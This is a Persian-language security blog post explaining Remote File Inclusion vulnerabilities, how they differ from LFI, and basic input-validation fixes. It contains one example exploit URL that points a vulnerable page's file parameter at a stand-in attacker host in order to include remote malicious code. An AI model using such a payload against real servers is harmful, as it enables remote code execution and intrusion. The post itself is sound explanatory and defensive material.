آسیب پذیری Remote File Inclusion (RFI)


شرح آسیب پذیری:

آسیب پذیری Remote File Inclusion (RFI) به مهاجم اجازه می دهد فایل دلخواه خود را از طریق ورودی قرار داده شده در برنامه، به سرور سایت و یا در مرورگر تزریق نماید. این آسیب پذیری به دلیل ضعف در پیاده سازی Input Validation ها صورت می پذیرد. این آسیب پذیری می تواند منجر به اسیب پذیری هایی از جمله Code execution و DoS و همچنین افشاء اطلاعات حساس گردد. تفاوت این اسیب پذیری با LFI در این است که در این آسیب پذیری تنها اجازه مشاهده و Inject فایل های به صورت Remote بر روی سرور وجود دارد. فایل های داخل سرور (Server Local File) را نمی توان در این آسیب پذیری به سرور تزریق نمود. البته می توان در صورت Upload نمودن Shell بعدا به این فایل ها دسترسی یافت ولی در حالت کلی این امر به صورت مستقیم امکان پذیر نیست.

به طور مثال مهاجم می تواند این آسیب پذیری را با لینکی همانند لینک ذیل Exploit نماید. همانطور که مشاهده می کنید، فایل مربوطه بعد از پارامتر file به URL اضافه شده است.

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

چگونه این آسیب پذیری را رفع کنیم ؟

1) کنترل ورودی کاربر در درخواست های POST/GET
2) بررسی ورودی های پارامتر های موجود در Header درخواست ها
3) کنترل پارامترهای موجود در URL و همچنین ورودی های کوکی

میلاد خوشدل

در حوزه‌ی امنیت وب و شبکه فعالیت می کند، عاشق پارکور است و مدیریت دیتاسنتر، امن سازی شبکه های مخابراتی و کابلی و برنامه نویسی وب و موبایل از تجارب کاری او می باشد. او در حال حاضر بنیانگذار ریجاکس است.

نظر خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

11 + 15 =


تگ های html مجاز به استفاده می باشند: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

ارسال یک پیام